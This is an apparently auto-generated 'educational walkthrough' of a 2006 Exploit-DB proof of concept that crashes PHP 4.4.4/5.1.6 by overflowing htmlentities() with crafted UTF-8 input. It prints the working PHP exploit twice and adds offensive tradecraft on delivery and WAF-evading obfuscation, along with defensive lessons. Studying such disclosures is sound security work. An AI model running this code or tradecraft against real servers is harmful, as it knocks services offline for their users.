By exploitdb papers bot•November 27, 2006•

papers

PHP htmlentities() Local Buffer Overflow - Educational Walkthrough

What this paper is

This paper is a Proof-of-Concept (PoC) demonstrating a local buffer overflow vulnerability in specific versions of PHP (4.4.4 and 5.1.6). The vulnerability is triggered by the htmlentities() function when processing specially crafted UTF-8 strings. The primary impact described is a Denial of Service (DoS).

Simple technical breakdown

The core of the exploit lies in how the htmlentities() function handles certain Unicode characters within a UTF-8 encoded string. The function has an internal buffer that is not large enough to accommodate the expanded representation of some characters when they are processed. By feeding it a string composed of a specific sequence of characters, we can overflow this buffer. This overflow corrupts memory, leading to a crash (DoS). The exploit uses a helper function toUTF() to generate these problematic characters.

Complete code and payload walkthrough

Let's break down the provided PHP code and the logic behind it.

<?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/

	//instantiate a string
	$str1 = "";

	for($i=0; $i < 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}

	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/

?>

<?php
	function toUTF($x) {
		return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
	}
?>

# milw0rm.com [2006-11-27]

Code Fragment/Block -> Practical Purpose:

<?php ... ?>: Standard PHP opening and closing tags, enclosing the script's logic.
/* ... */: Multi-line comments, providing author information and a brief explanation of the exploit.
// ...: Single-line comments, explaining specific lines of code.
$str1 = "";: Initializes an empty string variable named $str1. This string will be built up to contain the malicious input.
for($i=0; $i < 64; $i++) { ... }: A loop that iterates 64 times. In each iteration, it appends a character generated by toUTF(977) to $str1.
$str1 .= toUTF(977);: Appends the result of the toUTF() function (with the argument 977) to the $str1 string.
htmlentities($str1, ENT_NOQUOTES, "UTF-8");: This is the core function call that triggers the vulnerability.
- $str1: The input string containing the crafted characters.
- ENT_NOQUOTES: A flag indicating that no quotes should be encoded.
- "UTF-8": Specifies the character encoding of the input string.
function toUTF($x) { ... }: Defines a helper function named toUTF that takes an integer $x as input.
return chr(($x >> 6) + 192) . chr(($x & 63) + 128);: This is the logic within toUTF() for converting an integer into a two-byte UTF-8 sequence.
- $x >> 6: Bitwise right shift of $x by 6 bits. This isolates the higher-order bits.
- + 192: Adds 192 to the shifted value. This is part of the UTF-8 encoding scheme for characters that require two bytes. The first byte starts with 110xxxxx. 192 is 11000000 in binary.
- chr(...): Converts the resulting integer into its corresponding ASCII character.
- $x & 63: Bitwise AND operation of $x with 63 (binary 00111111). This isolates the lower 6 bits of $x.
- + 128: Adds 128 to the isolated lower bits. This is the second byte of the UTF-8 sequence, which starts with 10xxxxxx. 128 is 10000000 in binary.
- .: String concatenation, joining the two generated characters.

Explanation of toUTF(977):

The integer 977 in binary is 1111010001.

First byte calculation:
- 977 >> 6: 1111010001 shifted right by 6 becomes 1111.
- 1111 + 192: 1111 (decimal 15) + 192 (decimal 11000000) = 11001111 (decimal 207).
- chr(207): This character is 'Ï' (Latin Capital Letter I with diaeresis) in some extended ASCII sets, but its UTF-8 representation is what matters here.
Second byte calculation:
- 977 & 63: 1111010001 AND 00111111 becomes 010001.
- 010001 + 128: 010001 (decimal 17) + 128 (decimal 10000000) = 10010001 (decimal 145).
- chr(145): This character is '‘' (Left Single Quotation Mark) in some extended ASCII sets.

So, toUTF(977) generates a two-byte UTF-8 sequence that represents a character. The specific character represented by 977 when encoded this way is not directly relevant to the exploit's mechanism, but the structure of the generated UTF-8 sequence is. The exploit relies on the fact that the htmlentities() function, when processing this specific two-byte sequence (or similar ones derived from values around 977), incorrectly handles its internal buffer. The comment "automatically assumes it is a max of 8 chars" is a simplification; the actual bug is likely related to how the function calculates the length or processes multi-byte characters, leading to an overflow when the expanded representation exceeds its internal buffer capacity.

The loop runs 64 times, appending this two-byte sequence 64 times. This creates a string of 128 bytes. The htmlentities() function then attempts to process this string. The vulnerability occurs because the internal buffer used by htmlentities() to process these characters is too small, and the crafted input causes it to write beyond the allocated buffer, leading to a crash.

Shellcode/Payload Segments:

There is no explicit shellcode or executable payload in the traditional sense within this PoC. The "payload" is the crafted string itself, designed to trigger the DoS condition. The exploit does not aim to execute arbitrary code; its sole purpose is to cause the PHP interpreter to crash.

Practical details for offensive operations teams

Required Access Level: This vulnerability is a local buffer overflow. This means the attacker must already have the ability to execute code or run scripts on the target system, typically through a web application vulnerability (like file upload, code injection) or direct shell access. It is not a remote code execution vulnerability from an unauthenticated state.
Lab Preconditions:
- A target system running PHP versions 4.4.4 or 5.1.6.
- The ability to execute PHP scripts on the target. This could be via a web server (e.g., Apache, IIS) with PHP configured, or directly via the command-line PHP interpreter.
- The htmlentities() function must be enabled and not disabled by disable_functions in php.ini.
Tooling Assumptions:
- A web browser or command-line interface to deliver the PHP script.
- A text editor to create and modify the PHP exploit script.
- Potentially, a debugger or crash analysis tool on the target to confirm the crash and analyze its nature if deeper investigation is needed.
Execution Pitfalls:
- PHP Version Specificity: The exploit is highly dependent on the exact PHP versions mentioned. Newer versions are likely patched.
- Configuration Differences: The behavior of htmlentities() might be influenced by other PHP configurations or extensions, though this is less likely for a core function overflow.
- Environment: The exact overflow behavior and crash might vary slightly depending on the operating system and architecture, but the DoS outcome is expected.
- Input Validation: If the web application has robust input validation that sanitizes or limits the length of strings passed to PHP functions, this exploit might be prevented.
- Resource Limits: The target system might have process limits or watchdog mechanisms that could restart the PHP interpreter, masking the DoS or making it transient.
Tradecraft Considerations:
- Reconnaissance: Confirming the target PHP version is paramount. This can often be done by examining HTTP headers (e.g., X-Powered-By) or by using specific PHP information disclosure vulnerabilities.
- Delivery: The script can be delivered as a standalone PHP file uploaded to a web server and accessed via a URL, or executed directly on a compromised shell.
- Obfuscation: For web delivery, the PHP code might need to be obfuscated to bypass basic web application firewalls or intrusion detection systems that might flag known exploit patterns. However, the core logic here is quite simple.
- Impact Assessment: The primary goal is DoS. Operators should be aware that this will disrupt service for legitimate users. It's crucial to have authorization for such disruptive actions.
Likely Failure Points:
- Incorrect PHP Version: The most common failure point.
- Function Disabled: htmlentities() or related functions might be disabled in php.ini.
- Input Sanitization: The web application might prevent the malicious string from reaching the vulnerable function.
- Patching: The target system may have been patched against this specific vulnerability.

Where this was used and when

This exploit was published in November 2006. At that time, PHP 4 and early PHP 5 versions were widely used. Exploits of this nature were common in the mid-2000s as developers became more aware of buffer overflow vulnerabilities, and functions like htmlentities() were scrutinized. While this specific PoC might not have been widely weaponized in widespread attacks, the technique of exploiting buffer overflows in core PHP functions was a known attack vector. It's likely that similar vulnerabilities in other PHP functions or versions were exploited in the wild.

Defensive lessons for modern teams

Keep PHP Updated: This is the most critical defense. Regularly update PHP to the latest stable versions to patch known vulnerabilities.
Input Validation and Sanitization: Implement robust input validation on all user-supplied data before it reaches PHP functions. Sanitize data to prevent unexpected characters or sequences.
Web Application Firewalls (WAFs): Use WAFs to detect and block known malicious patterns, including those that might attempt to exploit common vulnerabilities.
Least Privilege: Run web servers and PHP processes with the minimum necessary privileges to limit the impact of any potential compromise.
Monitoring and Alerting: Monitor server logs for unusual activity, such as frequent PHP interpreter crashes or high error rates, which could indicate an attempted or successful exploit.
Code Auditing: For custom PHP applications, conduct regular security audits and code reviews to identify potential vulnerabilities.
disable_functions: While not a primary defense against all vulnerabilities, judicious use of disable_functions in php.ini can mitigate the impact of certain exploits if specific functions are not required for the application's operation.

ASCII visual (if applicable)

This exploit is a direct function call vulnerability. There isn't a complex architecture or flow to visualize. The process is linear:

+-----------------+      +-------------------+      +-------------------+
| Attacker Input  |----->| PHP Interpreter   |----->| htmlentities()    |
| (Crafted String)|      | (Vulnerable Ver.) |      | (Internal Buffer) |
+-----------------+      +-------------------+      +-------------------+
                                                            |
                                                            v
                                                      +-----------+
                                                      |   Crash   |
                                                      |    (DoS)  |
                                                      +-----------+

Source references

PAPER ID: 2857
PAPER TITLE: PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)
AUTHOR: Nick Kezhaya
PUBLISHED: 2006-11-27
PAPER URL: https://www.exploit-db.com/papers/2857
RAW URL: https://www.exploit-db.com/raw/2857

Original Exploit-DB Content (Verbatim)

<?php
	/*	    Nick Kezhaya	*/
	/*    www.whitepaperclip.com 	*/
	
	//instantiate a string
	$str1 = "";
	
	for($i=0; $i < 64; $i++) {
		$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
	}
	
	htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
	/*
		htmlentities() method automatically assumes
		it is a max of 8 chars.  uses greek theta
		character bug from UTF-8
	*/
	
?>

<?php
	function toUTF($x) {
		return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
	}
?>

# milw0rm.com [2006-11-27]